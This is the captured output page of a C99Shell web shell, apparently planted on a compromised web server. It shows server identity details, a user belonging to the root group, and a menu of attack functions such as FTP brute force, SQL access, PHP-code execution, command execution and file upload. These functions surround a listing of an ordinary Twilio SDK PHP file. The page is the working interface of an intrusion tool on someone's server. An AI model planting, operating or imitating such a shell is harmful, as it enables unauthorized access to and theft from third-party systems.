!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Studio/V2/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FlowValidateList.php (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Studio\V2;

use 
Twilio\Exceptions\TwilioException;
use 
Twilio\ListResource;
use 
Twilio\Options;
use 
Twilio\Serialize;
use 
Twilio\Values;
use 
Twilio\Version;

class 
FlowValidateList extends ListResource {
    
/**
     * Construct the FlowValidateList
     *
     * @param Version $version Version that contains the resource
     */
    
public function __construct(Version $version) {
        
parent::__construct($version);

        
// Path Solution
        
$this->solution = [];

        
$this->uri '/Flows/Validate';
    }

    
/**
     * Update the FlowValidateInstance
     *
     * @param string $friendlyName The string that you assigned to describe the Flow
     * @param string $status The status of the Flow
     * @param array $definition JSON representation of flow definition
     * @param array|Options $options Optional Arguments
     * @return FlowValidateInstance Updated FlowValidateInstance
     * @throws TwilioException When an HTTP error occurs.
     */
    
public function update(string $friendlyNamestring $status, array $definition, array $options = []): FlowValidateInstance {
        
$options = new Values($options);

        
$data Values::of([
            
'FriendlyName' => $friendlyName,
            
'Status' => $status,
            
'Definition' => Serialize::jsonObject($definition),
            
'CommitMessage' => $options['commitMessage'],
        ]);

        
$payload $this->version->update('POST'$this->uri, [], $data);

        return new 
FlowValidateInstance($this->version$payload);
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        return 
'[Twilio.Studio.V2.FlowValidateList]';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0076 ]--